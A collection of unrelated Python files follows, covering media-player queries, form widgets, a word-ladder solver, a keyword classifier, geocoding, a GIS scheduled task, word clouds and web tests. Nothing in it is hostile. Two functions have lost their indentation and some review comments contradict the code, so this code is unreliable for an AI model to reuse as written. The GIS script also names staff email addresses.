    Returns None when no matching service is registered.
    """
    mpris_prefix = 'org.mpris.MediaPlayer2.'
    for service in bus.list_names():
        if re.match(mpris_prefix, service):
            return bus.get_object(service, '/org/mpris/MediaPlayer2')
def list_properties(player):
    """Print every org.mpris.MediaPlayer2.Player property of *player*."""
    props_iface = dbus.Interface(player, dbus_interface='org.freedesktop.DBus.Properties')
    all_props = props_iface.GetAll('org.mpris.MediaPlayer2.Player')
    # Renamed the loop variable so it no longer shadows builtin `property`.
    for prop_name, prop_value in all_props.items():
        print(prop_name, ':', prop_value)
def get_curtrack(player):
    """Return "artist(s) - title" for the player's current track.

    Returns an empty string when there is no player.
    """
    if not player:
        return ""
    metadata = player.Get('org.mpris.MediaPlayer2.Player', 'Metadata',
                          dbus_interface='org.freedesktop.DBus.Properties')
    artists = ", ".join(metadata.get("xesam:artist"))
    title = metadata.get("xesam:title")
    return "{} - {}".format(artists, title)
def get_playpause(player):
    """Return True when *player* reports "Playing" ("" when no player)."""
    if not player:
        return ""
    status = player.Get('org.mpris.MediaPlayer2.Player', 'PlaybackStatus',
                        dbus_interface='org.freedesktop.DBus.Properties')
    return status == "Playing"
def main():
    """Print a play/pause glyph and the current track (Python 2 print)."""
    bus = get_bus()
    # NOTE(review): `bus` above is unused -- get_player opens a second
    # session-bus connection here.
    player = get_player(get_bus())
    playing = get_playpause(player)
    curtrack = get_curtrack(player)
    print "{} - {}".format(
        "▶" if playing else "▮▮",
        curtrack
    )

if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
"""Provides a ``CacheableWidgetMixin`` which allows you to construct deform
widgets whose ``values`` are populated dynamically (e.g.: from the db) to
delay actually making db calls until the form they are part of is actually
rendered, and to cache their rendered template output using `Alkey`_.
_Alkey: https://github.com/thruflo/alkey
"""
# Public API of this module.
__all__ = [
    'CacheableWidgetMixin',
    'CacheableSingleWidget',
    'CacheableOptGroupWidget',
    'CacheableMultipleSelectGroupsWidget',
    'CacheableTypeaheadInputWidget',
]

import logging
logger = logging.getLogger(__name__)
from .widget import ChosenSingleWidget
from .widget import ChosenOptGroupWidget
from .widget import MultipleSelectGroupsWidget as MSGWidget
from .widget import TypeaheadInputWidget
class CacheableWidgetMixin(object):
    """Provides a cacheable `self.serialize(...)`` method and a
    ``self.get_dynamic_values`` method that:
    * starts with ``self._values``
    * calls ``self.get_values()``
    * prepends ``self._append_values``.
    Use by i) mixing into a Widget class (that uses a ``values`` property)
    and ii) forcibly overriding the ``values`` property and ``serialize``
    method, e.g.::
        >>> from deform.widget import SelectWidget # or whatever
        >>>
        >>> class CacheableSelectWidget(SelectWidget, CacheableWidgetMixin):
        ...     values = property(CacheableWidgetMixin.get_dynamic_values)
        ...     serialize = CacheableWidgetMixin.serialize
        ...
    Then when you're instantiating the widget, pass in a ``get_values``
    callable, instead of a ``values`` list, e.g.::
        >>> widget = SomeCacheableWidget(get_values=lambda: ['a'])
        >>> widget.values
        ['a']
    You can also provide a static ``_values`` list and a list of values to
    append *after* the values have been got by calling ``get_values``, e.g.::
        >>> widget = SomeCacheableWidget(_values='a', get_values=lambda: ['b'],
        ...         _append_values=['c'])
        >>> widget.values
        ['a', 'b', 'c']
    The point of all of this being to delay populating the widget's values
    until the widget is serialized. Instead of passing a rendered ``form``
    through to the template, as per the standard ``pyramid_deform.FormView``
    api, we pass through a ``render_form`` function, which delays db query
    execution to within the template scope, which makes them cacheable, i.e.:
    if the template out is cached, next time the cache hits, the db call
    won't be made.
    If you would like to actually cache the widget's rendered template (as
    opposed to just allowing the rendered form to be cached without hitting
    the db) you can integrate with `Alkey <https://github.com/thruflo/alkey>`_
    by passing in a ``request`` when instantiating the widget and providing
    a ``cache_key_args`` list as a kwarg.
    For example, using colander.deferred with a form that's bind to the
    request as per ``.form.FormView``::
        from myapp.model import User
        @colander.deferred
        def user_widget(node, kw):
            request = kw['request]
            cache_key_args = ('myapp.user_widget', User)
            get_values = lambda: User.query.order_by(User.name).all()
            return CacheableSingleWidget(request=request, get_values=get_values,
                    cache_key_args=cache_key_args)
    What we get here is a single select widget that's populated with values
    from the database and cached with a cache key that will invalidate when
    any change is made to the users table (when a user is inserted, updated
    or deleted) *and* will vary when the user input (the `cstruct` passed
    to the widget's `serialize` method.) changes.
    """

    # Optional static values, and values appended after get_values() runs.
    _values = []
    _append_values = []

    def get_values(self):
        """Override this method by passing a ``get_values`` kw to the
        widget constructor.
        """
        return []

    def get_dynamic_values(self):
        """Standard logic to construct the widget values."""
        # Start with an empty list.
        values = []
        # If a static list of values was provided, use that.
        if self._values:
            values.extend(self._values)
        # If a dynamic function to get values was provided, extend the values
        # with its return value.
        get_values = getattr(self, 'get_values', None)
        if callable(get_values):
            values.extend(get_values())
        # If a list of values to append was provided, do so.
        if self._append_values:
            values.extend(self._append_values)
        # Return the list of values.
        return values

    def serialize(self, field, cstruct, **kw):
        """We do the default, as per the super class but, iff a ``cache_key_args``
        have been provided, we cache the output using Alkey's
        ``request.cache_key`` method.
        """
        # Prepare a function that returns the serialized value.
        # NOTE(review): super(self.__class__, ...) resolves against the
        # *runtime* class, so subclassing one of the Cacheable* widgets
        # further would recurse infinitely -- confirm before subclassing.
        default_serialize = super(self.__class__, self).serialize
        serialize = lambda: default_serialize(field, cstruct, **kw)
        # If we weren't passed any cache key args, walk away.
        key_args = getattr(self, 'cache_key_args', None)
        if not key_args:
            return serialize()
        # Otherwise get the cache key and use it to cache the output.
        request = self.request
        cache_key = request.cache_key(1, self.template, cstruct, *key_args)
        cache_decorator = request.cache_manager.cache(cache_key)
        cached_serialize = cache_decorator(serialize)
        return cached_serialize()
class CacheableSingleWidget(ChosenSingleWidget, CacheableWidgetMixin):
    """Extend the ``ChosenSingleWidget`` with a cacheable values property."""
    # Forcibly override ``values``/``serialize`` with the mixin's versions.
    values = property(CacheableWidgetMixin.get_dynamic_values)
    serialize = CacheableWidgetMixin.serialize
class CacheableOptGroupWidget(ChosenOptGroupWidget, CacheableWidgetMixin):
    """Extend the ``ChosenOptGroupWidget`` with a cacheable values property."""
    # Forcibly override ``values``/``serialize`` with the mixin's versions.
    values = property(CacheableWidgetMixin.get_dynamic_values)
    serialize = CacheableWidgetMixin.serialize
class CacheableMultipleSelectGroupsWidget(MSGWidget, CacheableWidgetMixin):
    """Extend the ``MSGWidget`` with a cacheable values property."""
    # Forcibly override ``values``/``serialize`` with the mixin's versions.
    values = property(CacheableWidgetMixin.get_dynamic_values)
    serialize = CacheableWidgetMixin.serialize
class CacheableTypeaheadInputWidget(TypeaheadInputWidget, CacheableWidgetMixin):
    """Extend the ``TypeaheadInputWidget`` with a cacheable values property."""
    # Forcibly override ``values``/``serialize`` with the mixin's versions.
    values = property(CacheableWidgetMixin.get_dynamic_values)
    serialize = CacheableWidgetMixin.serialize
|
"""
单词接龙
给定两个单词(beginWord 和 endWord)和一个字典,找到从 beginWord 到 endWord 的最短转换序列的长度。转换需遵循如下规则:
每次转换只能改变一个字母。
转换过程中的中间单词必须是字典中的单词。
说明:
如果不存在这样的转换序列,返回 0。
所有单词具有相同的长度。
所有单词只由小写字母组成。
字典中不存在重复的单词。
你可以假设 beginWord 和 endWord 是非空的,且二者不相同。
示例 1:
输入:
beginWord = "hit",
endWord = "cog",
wordList = ["hot","dot","dog","lot","log","cog"]
输出: 5
解释: 一个最短转换序列是 "hit" -> "hot" -> "dot" -> "dog" -> "cog",
返回它的长度 5。
示例 2:
输入:
beginWord = "hit"
endWord = "cog"
wordList = ["hot","dot","dog","lot","log"]
输出: 0
解释: endWord "cog" 不在字典中,所以无法进行转换。
"""
from collections import deque
class Solution(object):
    def ladderLength(self, beginWord, endWord, wordList):
        """BFS over one-letter transformations; returns the length of the
        shortest beginWord -> endWord chain, or 0 when unreachable.

        Fixes over the original:
        - the original removed items from ``wordList`` *while iterating it*,
          which skips candidates and can miss shortest paths;
        - it also mutated the caller's list; we work on a local set copy
          (which additionally makes removal O(1)).

        :type beginWord: str
        :type endWord: str
        :type wordList: List[str]
        :rtype: int
        """
        unvisited = set(wordList)
        if endWord not in unvisited:
            return 0
        queue = deque([(beginWord, 1)])
        while queue:
            word, count = queue.popleft()
            # Snapshot so we can discard from `unvisited` during the scan.
            for candidate in list(unvisited):
                if self.canTransform(candidate, word):
                    if candidate == endWord:
                        return count + 1
                    queue.append((candidate, count + 1))
                    unvisited.discard(candidate)
        return 0

    def canTransform(self, word1, word2):
        """Return True iff the equal-length words differ in exactly one position."""
        diff = 0
        for a, b in zip(word1, word2):
            if a != b:
                diff += 1
                if diff > 1:
                    # Early exit: more than one difference can never qualify.
                    return False
        return diff == 1
# Smoke test; expected output: 5 ("hit" -> "hot" -> "dot" -> "dog" -> "cog").
so = Solution()
print(so.ladderLength(beginWord="hit", endWord="cog",
                      wordList=["hot", "dot", "dog", "lot", "log", "cog"]))
|
import pandas as pd
import pickle
from sklearn.externals import joblib
from sklearn import preprocessing
from ..config import develop as default_config
# Keyword features the classifier looks for in a message.
# BUG FIX: this was a single triple-quoted string, so every consumer
# iterated it character by character (get_feature matched single
# characters, and build_model's `df[features]` indexed the DataFrame with
# the whole string). A list of keywords is what the rest of the module
# expects; iterating it still works everywhere a string did.
features = [
    'สวัสดี',      # hello
    'อะไร',       # what
    'ยังไง',      # how
    'เมื่อไหร่',    # when
    'บาย',        # bye
]
def get_feature(messages):
    """Build the feature vector for a list of ``(message, score)`` pairs.

    Each feature's value is the sum of scores of the messages containing
    it; ``feature_not_found`` is 1 when no feature matched anything.
    """
    # Pre-initialise every feature to 0, preserving feature order (the
    # original lazily created the same keys via try/except KeyError).
    features_result = {feature: 0 for feature in features}
    features_count = 0
    for feature in features:
        for message, score in messages:
            if feature in message:
                features_result[feature] += score
                features_count += 1
    features_result['feature_not_found'] = 1 if features_count == 0 else 0
    return features_result
def build_model():
    """Train and persist the keyword-based LogisticRegression classifier.

    Side effects: writes data/scaler.p (Normalizer) and
    data/current_model.pkl (fitted model).
    """
    data = []
    training = pd.read_csv(default_config.BASE_DIR + '/data/data.csv')
    # NOTE(review): iterating a DataFrame yields its *column labels*, not
    # rows -- this looks like it should iterate a message column; verify.
    for messages in training:
        features_result = get_feature([
            (messages, 1),
        ])
        data.append(features_result)
    df = pd.DataFrame(data=data)
    # NOTE(review): if `features` is the module's multi-line string,
    # df[features] raises KeyError; it presumably should be a list of
    # feature names -- confirm.
    x_data = df[features]
    # Scale each sample vector to unit norm.
    scaler = preprocessing.Normalizer().fit(x_data)
    x_data = scaler.transform(x_data)
    y_data = df['class']
    from sklearn.linear_model import LogisticRegression
    model = LogisticRegression()
    model.fit(x_data, y_data)
    model.score(x_data, y_data)
    # Persist the scaler and the trained model for get_result().
    pickle.dump(scaler, open(default_config.BASE_DIR + '/data/scaler.p', 'wb'))
    joblib.dump(model, default_config.BASE_DIR + '/data/current_model.pkl')
def get_result(messages):
    """Classify *messages* using the persisted scaler/PCA/model pipeline.

    :return: the model's predicted class array
    """
    scaler = pickle.load(open(default_config.BASE_DIR + '/data/scaler.p', 'rb'))
    # NOTE(review): build_model() never writes pca.p, so this load fails
    # unless the PCA artifact is produced elsewhere -- confirm.
    pca = pickle.load(open(default_config.BASE_DIR + '/data/pca.p', 'rb'))
    model = joblib.load(default_config.BASE_DIR + '/data/current_model.pkl')
    test_data = [get_feature([(messages, 1)])]
    x_test = pd.DataFrame(data=test_data)[features]
    x_test = scaler.transform(x_test)
    x_test = pca.transform(x_test)
    predicted = model.predict(x_test)
    return predicted
|
import urllib.request
import json
from urllib.parse import urlencode, quote_plus
serviceurl = 'http://py4e-data.dr-chuck.net/json?'

# Interactive loop: geocode each entered address until a blank line.
while True:
    address = input('Enter location: ')
    if len(address) < 1: break
    url = serviceurl + urlencode({'sensor': 'false', 'address': address})
    print('Retrieving', url)
    uh = urllib.request.urlopen(url)
    # BUG FIX: the response is bytes; the original json.loads(str(data))
    # parsed the "b'...'" repr and always failed. Decode instead.
    data = uh.read().decode()
    print('Retrieved', len(data), 'characters')
    try:
        js = json.loads(data)
    except ValueError:
        js = None
    # BUG FIX: guard against js being None before using `in`
    # (the original raised TypeError on a failed parse).
    if js is None or 'status' not in js or js['status'] != 'OK':
        print('==== Failure To Retrieve ====')
        print(data)
        continue
    location = js['results'][0]['place_id']
    print('Place id', location)
# RecreateDistributionAreaPolygon.py
# Create DistributionArea polygon feature class
# Copy it into the production database.
# This program is run monthly on Arctic as a scheduled task
#
# This program can only run successfully when
# a connection can be created to the production database
#
# The DistributionArea feature class does not reside in a dataset for two reasons:
# (1) Since it does not have to be versioned for editing, it does not have to
# reside in a versioned feature class.
# (2) Since it is updated programmatically, it must not reside in a dataset that
# is locked when services are running.
# 2013-04-05 BLG:
# - Only include mains where Subsystem = 'Distribution'
# - Increase buffer zone distance from 100 feet to 500 feet
# - Do not eliminate holes from polygons
import arcgisscripting, datetime, os, smtplib, sys
# Shared geoprocessor instance used by all functions below.
gp = arcgisscripting.create()

# Production database - read, update.
N = r'\\Arctic\GIS_Data'
SDE = N + r'\GIS_Private\DataResources\DBA\Datasets\Export\Interfaces\Connections\Conway_sdeVector_sdeDataOwner.sde'
SDE_wPressurizedMain = SDE + r'\sdeVector.sdeDataOwner.WaterUtility\sdeVector.sdeDataOwner.wPressurizedMain'
SDE_DistributionArea = SDE + r'\sdeVector.sdeDataOwner.DistributionArea'

# Temporary database - create, update, delete.
GDB = r'C:\GIS_Development\DataResources\DBA\Datasets\Export\Data\Databases'
GDB_DatabaseName = r'DistributionArea.gdb'
GDB_Database = GDB + r'\\' + GDB_DatabaseName
GDB_DistributionMain = GDB_Database + r'\DistributionMain'
GDB_DistributionArea = GDB_Database + r'\DistributionArea'

# Status report email.
MailServer = 'nnww-smtp.nnww.nnva.gov'
# Sender defaults to the account running the scheduled task.
MailSender = '%s <%s@nnva.gov>' % (os.environ['USERNAME'], os.environ['USERNAME']) # 'GisAdmin <GisAdmin@nnva.gov>'
MailRecipientsIfSuccess = ['Marietta Washington <mvwashington@nnva.gov>',
                           'Brian Kingery <bkingery@nnva.gov>',
                           'Barbara Gates <bgates@nnva.gov>']
MailRecipientsIfError = ['Marietta Washington <mvwashington@nnva.gov>',
                         'Brian Kingery <bkingery@nnva.gov>',
                         'Barbara Gates <bgates@nnva.gov>']
################################################################################
def RecreateDistributionAreaPolygon():
    '''Top-level driver: rebuild the DistributionArea polygon in a scratch
    GDB, push it to production, and ALWAYS email a status report, whether
    the run succeeded or failed.'''
    startTime = datetime.datetime.now()
    errorMsgs = []
    try:
        CreateTemporaryDatabase()
        CreateFeatureClass()
        CopyToProductionDatabase()
        DeleteTemporaryDatabase()
    # Python 2 except syntax; the exception object is collected for the
    # status email instead of crashing the scheduled task silently.
    except BaseException, e:
        errorMsgs.append(e)
    finally:
        SendStatusMail(mailServer = MailServer,
                       sender = MailSender,
                       recipientsIfSuccess = MailRecipientsIfSuccess,
                       recipientsIfError = MailRecipientsIfError,
                       startDateTime = startTime,
                       errorMessages = errorMsgs)
################################################################################
def CreateTemporaryDatabase():
    '''Create a fresh scratch file GDB and copy the distribution mains into it.

    Any previous scratch GDB is deleted first so stale features never leak
    into the new run.'''
    print 'CREATING TEMPORARY DATABASE ...'
    if not gp.Exists(GDB):
        print 'Creating directory ' + GDB + ' ...'
        CreateDirectory(GDB)
    if gp.Exists(GDB_Database):
        print 'Deleting old temporary database ' + GDB_Database + ' ...'
        gp.Delete(GDB_Database)
    print 'Creating temporary database ' + GDB_Database + ' ...'
    gp.CreateFileGDB(GDB, GDB_DatabaseName)
    print 'Copying distribution mains from ' + SDE_wPressurizedMain + ' to temporary database ' + GDB_DistributionMain + ' ...'
    # Only mains whose Subsystem code is 50 ('Distribution') are copied,
    # per the 2013-04-05 change note in the file header.
    whereClause = 'Subsystem = 50' # Distribution
    gp.Select_analysis(SDE_wPressurizedMain, GDB_DistributionMain, whereClause)
def CreateFeatureClass():
    '''Buffer the copied mains into one dissolved polygon and stamp it with
    a FeatureCreationDate field set to the run date.'''
    print 'CREATING DISTRIBUTION AREA FEATURE CLASS ...'
    print 'Buffering mains to create polygon feature class ' + GDB_DistributionArea + ' ...'
    bufferZoneDistance = '500 FEET' # Create buffer zone of this distance around input features
    lineSide = 'FULL' # Generate buffer on both sides of each line
    lineEndType = 'ROUND' # Generate buffer in the shape of a half circle at the end of each line
    dissolveOption = 'ALL' # Dissolve all buffers together into a single feature & remove overlap
    dissolveField = '' # Ignore field values when dissolving buffers
    gp.Buffer_analysis(GDB_DistributionMain, GDB_DistributionArea, bufferZoneDistance, lineSide, lineEndType, dissolveOption, dissolveField)
    print 'Adding field FeatureCreationDate to ' + GDB_DistributionArea + ' ...'
    gp.AddField(GDB_DistributionArea, 'FeatureCreationDate', 'DATE')
    # NOTE(review): '' below is adjacent-string concatenation, so this prints
    # "todays date" -- the intended escaped apostrophe is missing.
    print 'Updating field: Setting FeatureCreationDate = today''s date ...'
    gp.CalculateField(GDB_DistributionArea, 'FeatureCreationDate', 'Date()', 'VB')
def CopyToProductionDatabase():
    '''Repopulate (not replace) the production DistributionArea feature class.'''
    # This procedure repopulates the DistributionArea feature class in the production database.
    # (It does not replace the entire feature class. Deleting the old feature class requires an
    # exclusive schama lock, which may not be available if services are running or basemap network is open.)
    print 'COPYING DISTRIBUTION AREA FEATURES TO PRODUCTION DATABASE ...'
    print 'Deleting old features from ' + SDE_DistributionArea + ' ...'
    gp.deletefeatures(SDE_DistributionArea)
    print 'Copying new features from ' + GDB_DistributionArea + ' to ' + SDE_DistributionArea + ' ...'
    gp.Append_management(GDB_DistributionArea, SDE_DistributionArea)
def DeleteTemporaryDatabase():
    '''Remove the scratch file GDB created by CreateTemporaryDatabase.'''
    print 'DELETING TEMPORARY DATABASE ...'
    print 'Deleting temporary database ' + GDB_Database + ' ...'
    gp.Delete(GDB_Database)
################################################################################
def CreateDirectory(fullPath):
    '''Create directory if it does not exist (including all intermediate
    folders), using the geoprocessor so UNC paths work like local ones.'''
    # Split fullPath into two parts: the drive or UNC prefix, and the remainder
    (prefix, remainder) = os.path.splitdrive(fullPath)
    if prefix == '':
        # No drive letter: try a UNC prefix (\\server\share).
        # NOTE(review): os.path.splitunc exists only on Windows Python 2.
        (prefix, remainder) = os.path.splitunc(fullPath)
    if remainder[0] == '\\':
        remainder = remainder[1:]
    # Split remainder into folder names
    folders = remainder.split('\\')
    # Create each subdirectory in fullPath that does not already exist
    path = prefix
    for folder in folders:
        pathAndFolder = path + '\\' + folder
        if not gp.Exists(pathAndFolder):
            print ' Creating directory ' + pathAndFolder + ' ...'
            gp.CreateFolder(path, folder)
        path = pathAndFolder
################################################################################
def SendStatusMail(mailServer=MailServer,
sender=MailSender,
recipientsIfSuccess=[],
recipientsIfError=[],
startDateTime=datetime.datetime.now(),
errorMessages=[],
warningMessages=[],
informationalMessages=[],
logFiles=[]):
print 'Sending status email ...'
endDateTime = datetime.datetime.now()
elapsedTime = endDateTime - startDateTime
server = os.environ['COMPUTERNAME'].lower()
program = os.path.basename(sys.argv[0])
args = ' '.join(sys.argv[1:])
task = '%s %s' % (program, args)
if errorMessages:
status = 'Error'
recipients = recipientsIfError
elif logFiles:
status = 'Termination status unknown'
recipients = Union(recipientsIfSuccess, recipientsIfError)
else:
status = 'Success'
recipients = recipientsIfSuccess
subject = 'Scheduled Task - %s - %s' % (task, status)
body = 'Task: %s\r\n\r\n' % task
body += 'Server: %s\r\n\r\n' % server
body += 'Started: %s\r\n\r\n' % startDateTime.strftime('%A, %B %d, %Y %I:%M:%S %p')
body += 'Terminated: %s\r\n\r\n' % endDateTime.strftime('%A, %B %d, %Y %I:%M:%S %p')
body += 'Elapsed Time: %s\r\n\r\n' % str(elapsedTime).split('.')[0]
body += 'Status: %s\r\n\r\n' % status
if errorMessages:
body = body + '-------- %s --------\r\n\r\n' % 'Error Messages'
for m in errorMessages:
body += '%s\r\n' % str(m)
body += '\r\n'
if warningMessages:
body = body + '-------- %s --------\r\n\r\n' % 'Warning Messages'
for m in warningMessages:
body += '%s\r\n' % str(m)
body += '\r\n'
if informationalMessages:
body = body + '-------- %s --------\r\n\r\n' % 'Informational Messages'
for m in informationalMessages:
body += '%s\r\n' % str(m)
body += '\r\n'
for logFile in logFiles:
(logPath, logFileName) = os.path.split(logFile)
body += '-------- %s --------\r\n\r\n' % logFileName
f = open(logFile, 'r')
body += ''.join(f.readlines())
f.close()
body += '\r\n'
body += '\r\n'
body += 'This is an automatically generated message. Please do not reply.\r\n'
SendMail(mailServer, sender, recipients, subject, body)
def SendMail(mailServer=MailServer,
             sender=MailSender,
             recipients=None,
             subject='',
             body=''):
    '''Send a plain-text email via SMTP; a no-op when recipients is empty.

    recipients defaults to None (not []) to avoid a shared mutable default;
    the SMTP connection is closed in a finally block so it is not leaked
    when sendmail raises.
    '''
    if not recipients:
        return
    message = 'From: %s\r\n' % sender
    message += 'To: %s\r\n' % ', '.join(recipients)
    message += 'Subject: %s\r\n\r\n' % subject
    message += '%s\r\n' % body
    server = smtplib.SMTP(mailServer)
    try:
        server.sendmail(sender, recipients, message)
    finally:
        server.quit()
def Union(list1, list2):
    '''Return a list of the distinct elements appearing in either input.

    Result order is unspecified (set semantics), matching the caller's use
    for de-duplicating email recipient lists.
    '''
    return list(set(list1) | set(list2))
################################################################################
RecreateDistributionAreaPolygon()
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.11.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from wordcloud import WordCloud
from konlpy.tag import Okt
from PIL import Image
import numpy as np
from wordcloud import ImageColorGenerator
# -
# +
# The four snapshots (2017.08, 2018.02, 2019.12, 2020.01) shared an
# identical, copy-pasted clean-and-plot pipeline; it is factored into
# helpers and driven by a single loop.
CSV_FILES = ['2017.08_low_info.csv', '2018.02_low_info.csv',
             '2019.12_low_info.csv', '2020.01_low_info.csv']


def _load_titles(csv_path):
    """Read one listings CSV and concatenate all 'title' values into a string."""
    frame = pd.read_csv(csv_path)
    return ''.join(v for v in frame['title'])


def _clean(text):
    """Drop the dominant keyword '부동산' and periods so they don't swamp the cloud."""
    return text.replace('부동산', '').replace('.', '')


def _show_wordcloud(text, mask):
    """Render one masked word cloud for `text` and display it."""
    cloud = WordCloud(font_path='NanumSquareR.ttf',
                      max_font_size=100,
                      random_state=42,
                      mask=mask,
                      max_words=150,
                      background_color='white',
                      width=mask.shape[1],
                      height=mask.shape[0]).generate(text)
    plt.figure(figsize=(12, 15))
    plt.axis('off')
    plt.imshow(cloud, interpolation='bilinear')
    plt.show()
# -

# +
# Mask and color source come from the Seoul silhouette image.
image_example = np.array(Image.open('seoul.jpg'))
mask = np.array(image_example)
image_colors = ImageColorGenerator(image_example)  # kept for parity; currently unused

for _csv in CSV_FILES:
    _show_wordcloud(_clean(_load_titles(_csv)), mask)
# -
|
__author__ = 'Jeevan'
"""
Mapper program takes input files from the hadoop job, i.e data from pos and neg
folders from both training and testing.
"""
import sys
import glob
from nltk.corpus import stopwords # Import the stop word list
import re
from bs4 import BeautifulSoup # Imported to remove html tags from the review data
def main():
from nltk.stem import SnowballStemmer # Imported to perform stemming on the data
stemmer = SnowballStemmer('english')
stop_words = stopwords.words("english")
for line in sys.stdin:
line = line.strip()
id,label,review = line.split('||') # Separates each line into id,label,review
html_strip = BeautifulSoup(review,'html.parser')
words = re.sub("[^a-zA-Z]"," ",html_strip.get_text() )
words = words.split()
words = [w.lower() for w in words if w.lower() not in stop_words] #collecting words which are not stop words
words = [stemmer.stem(word) for word in words]
print '%s\t%s\t%s' % (label,id,' '.join(words)) # Mapper output with Label as key and the rest are values
if __name__ =="__main__":
main()
|
from collections import Counter
class ValueHistogram:
    """Render a vertical ASCII histogram of digit frequencies (values 0-9)."""

    def build(self, values):
        """Return the histogram as a list of 10-character rows, top row first.

        Each column i is a bar of 'X' for the count of digit i, padded with
        '.' up to max(count)+1 (so the top row is always empty padding).
        Raises ValueError when `values` is empty (max of no counts).
        """
        counts = Counter(values)
        height = max(counts.values()) + 1
        # One string per digit column, bar at the bottom after the final flip.
        columns = [
            'X' * counts[digit] + '.' * (height - counts[digit])
            # range (not the Python-2-only xrange): identical behavior here
            # and portable to Python 3.
            for digit in range(10)
        ]
        # Transpose columns into rows, then flip so padding is on top.
        return [''.join(row) for row in zip(*columns)][::-1]
|
#%%
from cv2 import cv2
import numpy as np
import matplotlib.pyplot as plt
import json
import os
def proccess_image(img):
    """Normalize a cheque photo: resize to 1200x600, grayscale, light blur.

    NOTE(review): the 'proccess' spelling is kept because external callers
    may depend on the name; consider renaming with a compatibility alias.
    """
    width = 1200
    height = 600
    img = cv2.resize(img, (width, height))
    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # 3x3 Gaussian blur (sigma=3) to suppress scanning noise before ORB.
    img = cv2.GaussianBlur(img, (3, 3), 3)
    return img
orb = cv2.ORB_create(nfeatures=1000)
bf = cv2.BFMatcher()
class Sample:
    """A reference cheque icon: its ORB descriptor, crop area, and bank name."""

    def __init__(self, descriptor, icon_area, class_name):
        # ORB feature descriptor of the reference icon image.
        self.descriptor = descriptor
        # [row_start, row_end, col_start, col_end] crop in the processed image.
        self.icon_area = icon_area
        self.bank_name = class_name

    def crop_by_icon_area(self, img):
        """Crop `img` to this sample's icon region."""
        area = self.icon_area
        return img[area[0]:area[1], area[2]:area[3]]

    def match(self, img):
        """Score how well `img`'s icon region matches this sample's icon.

        Returns -1 when no descriptors are found in the crop, -2 when
        knnMatch could not produce pairs, otherwise the number of matches
        passing Lowe's ratio test (higher = better match).
        """
        img = proccess_image(img)
        img = self.crop_by_icon_area(img)
        # Uses the module-level ORB detector and BF matcher.
        _, other_des = orb.detectAndCompute(img, None)
        if other_des is None:
            return -1
        matches = bf.knnMatch(self.descriptor, other_des, k=2)
        if matches and len(matches[0]) != 2:
            return -2
        score = 0
        for m, n in matches:
            # Lowe's ratio test: keep only distinctly-best matches.
            if m.distance < 0.75 * n.distance:
                score += 1
        return score

    def show_icon_area(self, img):
        """Display the cropped icon region (debugging helper)."""
        plt.imshow(self.crop_by_icon_area(img))
        plt.show()
# To add descriptors for a new cheque:
# 1. Put a cropped sample of the new icon image in the 'icons/' directory.
#    Name it as follows: listOfCoordinates-bankName.jpg, where
#    listOfCoordinates is the area position and size where this icon appears
#    in the cheque. Example: [100, 120, 10, 50]-discount.jpg
# 2. Run this file (it will create the descriptors and save them in 'icons/').
# 3. Move the newly created descriptor files (.json) to the '/Descriptors' directory.
# 4. Create a file in '/Parser' with a class modeled on the template
#    /Parser/mizrahi_parser.py (inherit from BaseCheque).
# 5. Import the newly created file in 'Parser/__init__.py' like the others.
samples = []
# Build a Sample for every reference icon image in icons/.
# File-name convention: '<json-coordinate-list>-<bankName>.jpg'.
for name in os.listdir('icons/'):
    if '.jpg' in name:
        icon_area = json.loads(name.split('-')[0])
        # NOTE(review): breaks if the bank name itself contains a '-'.
        bank_name = name.split('-')[1].split('.')[0]
        # 0 -> load as grayscale, matching proccess_image output.
        img = cv2.imread('icons/' + name, 0)
        kp, des = orb.detectAndCompute(img, None)
        sample = Sample(des, icon_area, bank_name)
        samples.append(sample)
# Serialize each sample's descriptor to JSON next to the icon images.
for i, sample in enumerate(samples):
    file_name = f'{sample.bank_name}-{i}.json'
    data = {
        'bank_name': sample.bank_name,
        'descriptor': sample.descriptor.tolist(),
        'icon_area': sample.icon_area,
    }
    data = json.dumps(data)
    with open('icons/' + file_name, 'w') as f:
        f.write(data)
|
from __future__ import print_function, unicode_literals
import json
from aspen.utils import utcnow
from gratipay.testing import Harness
class Tests(Harness):
    """End-to-end tests for the /%username/public.json endpoint."""

    def make_participant(self, *a, **kw):
        # Every participant created in these tests is a claimed account.
        kw['claimed_time'] = utcnow()
        return Harness.make_participant(self, *a, **kw)

    def test_on_key_gives_gratipay(self):
        self.make_participant('alice', last_bill_result='')
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data['on'] == 'gratipay'

    def test_anonymous_gets_receiving(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '1.00')
        data = json.loads(self.client.GET('/bob/public.json').body)
        assert data['receiving'] == '1.00'

    def test_anonymous_does_not_get_my_tip(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '1.00')
        data = json.loads(self.client.GET('/bob/public.json').body)
        # dict.has_key is Python 2 only (this code base targets Python 2).
        assert data.has_key('my_tip') == False

    def test_anonymous_gets_giving(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '1.00')
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data['giving'] == '1.00'

    def test_anonymous_gets_null_giving_if_user_anonymous(self):
        alice = self.make_participant( 'alice'
                                     , last_bill_result=''
                                     , anonymous_giving=True
                                      )
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '1.00')
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data['giving'] == None

    def test_anonymous_gets_null_receiving_if_user_anonymous(self):
        alice = self.make_participant( 'alice'
                                     , last_bill_result=''
                                     , anonymous_receiving=True
                                      )
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '1.00')
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data['receiving'] == None

    def test_anonymous_does_not_get_goal_if_user_regifts(self):
        # goal=0 means the user regifts everything; the key is omitted entirely.
        self.make_participant('alice', last_bill_result='', goal=0)
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data.has_key('goal') == False

